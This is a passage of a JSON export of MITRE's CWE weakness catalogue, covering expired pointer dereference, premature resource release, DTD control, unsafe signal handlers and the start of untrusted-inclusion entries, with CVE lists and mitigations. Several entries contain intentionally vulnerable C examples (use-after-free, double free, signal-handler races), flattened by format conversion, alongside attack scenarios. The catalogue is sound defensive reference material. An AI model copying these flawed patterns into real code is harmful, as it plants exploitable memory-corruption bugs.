accessed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the uninitialized pointer is used in a read operation, an attacker might be able to read sensitive portions of memory."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the uninitialized pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the uninitialized pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2009-2768","Description":"Pointer in structure is not initialized, leading to NULL pointer dereference (CWE-476) and system crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2768"},{"Reference":"CVE-2009-1721","Description":"Free of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721"},{"Reference":"CVE-2009-1415","Description":"Improper handling of invalid signatures leads to free of invalid pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415"},{"Reference":"CVE-2009-0846","Description":"Invalid encoding triggers free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846"},{"Reference":"CVE-2009-0040","Description":"Crafted PNG image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040"},{"Reference":"CVE-2008-2934","Description":"Crafted GIF image leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-4682","Description":"Access of uninitialized pointer might lead to code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682"},{"Reference":"CVE-2007-4639","Description":"Step-based manipulation: invocation of debugging function before the primary initialization function leads to access of an uninitialized pointer and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4639"},{"Reference":"CVE-2007-4000","Description":"Unchecked return values can lead to a write to an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4000"},{"Reference":"CVE-2007-2442","Description":"zero-length input leads to free of uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442"},{"Reference":"CVE-2007-1213","Description":"Crafted font leads to uninitialized function pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1213"},{"Reference":"CVE-2006-6143","Description":"Uninitialized function pointer in freed memory is invoked","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6143"},{"Reference":"CVE-2006-4175","Description":"LDAP server mishandles malformed BER queries, leading to free of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4175"},{"Reference":"CVE-2006-0054","Description":"Firewall can crash with certain ICMP packets that trigger access of an uninitialized pointer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0054"},{"Reference":"CVE-2003-1201","Description":"LDAP server does not initialize members of structs, which leads to free of uninitialized pointer if an LDAP request fails.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1201"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"825":{"attr":{"@_ID":"825","@_Name":"Expired Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid.","Extended_Description":"When a program releases memory, but it maintains a pointer to that memory, then the memory might be re-allocated at a later time. If the original pointer is accessed to read or write data, then this could cause the program to read or modify data that is in use by a different function or process. Depending on how the newly-allocated memory is used, this could lead to a denial of service, information exposure, or code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Dangling pointer"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"If the expired pointer is used in a read operation, an attacker might be able to control data read in by the application."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If the expired pointer references a memory location that is not accessible to the program, or points to a location that is \\"malformed\\" (such as NULL) or larger than expected by a read or write operation, then a crash may occur."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the expired pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-71"},"Intro_Text":"The following code shows a simple example of a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."},{"attr":{"@_Demonstrative_Example_ID":"DX-72"},"Intro_Text":"The following code shows a simple example of a double free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5013","Description":"access of expired memory address leads to arbitrary code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5013"},{"Reference":"CVE-2010-3257","Description":"stale pointer issue leads to denial of service and possibly other consequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3257"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2007-1211","Description":"read of value at an offset into a structure after the offset is no longer valid","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1211"}]},"Notes":{"Note":[{"#text":"There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains.","attr":{"@_Type":"Maintenance"}},{"#text":"Many weaknesses related to pointer dereferences fall under the general term of \\"memory corruption\\" or \\"memory safety.\\" As of September 2010, there is no commonly-used terminology that covers the lower-level variants.","attr":{"@_Type":"Terminology"}},{"#text":"Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"826":{"attr":{"@_ID":"826","@_Name":"Premature Release of Resource During Expected Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program releases a resource that is still intended to be used by the program itself or another actor.","Extended_Description":{"xhtml:p":["This weakness focuses on errors in which the program should not release a resource, but performs the release anyway. This is different than a weakness in which the program releases a resource at the appropriate time, but it maintains a reference to the resource, which it later accesses. For this weakness, the resource should still be valid upon the subsequent access.","When a program releases a resource that is still being used, it is possible that operations will still be taken on this resource, which may have been repurposed in the meantime, leading to issues similar to CWE-825. Consequences may include denial of service, information exposure, or code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"If the released resource is subsequently reused or reallocated, then a read operation on the original resource might access sensitive data that is associated with a different user or entity."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"When the resource is released, the software might modify some of its structure, or close associated channels (such as a file descriptor). When the software later accesses the resource as if it is valid, the resource might not be in an expected state, leading to resultant errors that may lead to a crash."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Application Data","Modify Memory"],"Note":"When the resource is released, the software might modify some of its structure. This might affect program logic in the sections of code that still assume the resource is active. If the released resource is related to memory and is used in a function call, or points to unexpected data in a write operation, then code execution may be possible upon subsequent accesses."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-3547","Description":"chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"}},"Notes":{"Note":{"#text":"Under-studied and under-reported as of September 2010. This weakness has been reported in high-visibility software, although the focus has been primarily on memory allocation and de-allocation. There are very few examples of this weakness that are not directly related to memory management, although such weaknesses are likely to occur in real-world software for other types of resources.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-09-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}]}},"827":{"attr":{"@_ID":"827","@_Name":"Improper Control of Document Type Definition","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the software to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker.","Extended_Description":{"xhtml:p":["As DTDs are processed, they might try to read or include files on the machine performing the parsing. If an attacker is able to control the DTD, then the attacker might be able to specify sensitive resources or requests or provide malicious content.","For example, the SOAP specification prohibits SOAP messages from containing DTDs."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"776","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system."},{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"The DTD may cause the parser to consume excessive CPU cycles or memory using techniques such as nested or recursive entity references (CWE-776)."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server\'s trust relationship with other entities."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-773"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-10-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"828":{"attr":{"@_ID":"828","@_Name":"Signal Handler with Functionality that is not Asynchronous-Safe","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted.","Extended_Description":{"xhtml:p":["This can lead to an unexpected system state with a variety of potential consequences depending on context, including denial of service and code execution.","Signal handlers are typically intended to interrupt normal functionality of a program, or even other signals, in order to notify the process of an event. When a signal handler uses global or static variables, or invokes functions that ultimately depend on such state or its associated metadata, then it could corrupt system state that is being used by normal functionality. This could subject the program to race conditions or other weaknesses that allow an attacker to cause the program state to be corrupted. While denial of service is frequently the consequence, in some cases this weakness could be leveraged for code execution.","There are several different scenarios that introduce this issue:","Note that in some environments or contexts, it might be possible for the signal handler to be interrupted itself.","If both a signal handler and the normal behavior of the software have to operate on the same set of state variables, and a signal is received in the middle of the normal execution\'s modifications of those variables, the variables may be in an incorrect or corrupt state during signal handler execution, and possibly still incorrect or corrupt upon return."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Invocation of non-reentrant functions from within the handler. One example is malloc(), which modifies internal global variables as it manages memory. Very few functions are actually reentrant.","Code sequences (not necessarily function calls) contain non-atomic use of global variables, or associated metadata or structures, that can be accessed by other functionality of the program, including other signal handlers. Frequently, the same function is registered to handle multiple signals.","The signal handler function is intended to run at most one time, but instead it can be invoked multiple times. This could happen by repeated delivery of the same signal, or by delivery of different signals that have the same handler function (CWE-831)."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":{"xhtml:p":["Eliminate the usage of non-reentrant functionality inside of signal handlers. This includes replacing all non-reentrant library calls with reentrant calls.","Note: This will not always be possible and may require large portions of the software to be rewritten or even redesigned. Sometimes reentrant-safe library alternatives will not be available. Sometimes non-reentrant interaction between the state of the system and the signal handler will be required by design."]},"Effectiveness":"High"},{"Phase":"Implementation","Description":"Where non-reentrant functionality must be leveraged within a signal handler, be sure to block or mask signals appropriately. This includes blocking other signals within the signal handler itself that may also leverage the functionality. It also includes blocking all signals reliant upon the functionality when it is being accessed or modified by the normal behaviors of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]},{"attr":{"@_Demonstrative_Example_ID":"DX-48"},"Intro_Text":"The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;signal.h&gt;#include &lt;syslog.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void *global1, *global2;char *what;void sh (int dummy) {}int main (int argc,char* argv[]) {}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",what);free(global2);free(global1);sleep(10);exit(0);","xhtml:br":["","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Sleep statements added to expand timing window for race condition */"}}]}},"Body_Text":["However, the following sequence of events may result in a double-free (CWE-415):",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a SIGHUP is delivered to the process"},{"xhtml:div":"sh() is invoked to process the SIGHUP"},{"xhtml:div":"This first invocation of sh() reaches the point where global1 is freed"},{"xhtml:div":"At this point, a SIGTERM is sent to the process"},{"xhtml:div":"the second invocation of sh() might do another free of global1"},{"xhtml:div":"this results in a double-free (CWE-415)"}]}},"This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within \\"Delivering Signals for Fun and Profit\\" [REF-360]."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4109","Description":"Signal handler uses functions that ultimately call the unsafe syslog/malloc/s*printf, leading to denial of service via multiple login attempts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4109"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-0794","Description":"SIGURG can be used to remotely interrupt signal handler; other variants exist.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"},{"Reference":"CVE-2002-1563","Description":"SIGCHLD not blocked in a daemon loop while counter is modified, causing counter to get out of sync.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1563"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG31-C","Entry_Name":"Do not access or modify shared objects in signal handlers"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"829":{"attr":{"@_ID":"829","@_Name":"Inclusion of Functionality from Untrusted Control Sphere","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.","Extended_Description":{"xhtml:p":["When including third-party functionality, such as a web widget, library, or other source of functionality, the software must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.","This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user\'s cookies, or open redirect to malware (CWE-601)."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Forced Path Execution","Monitored 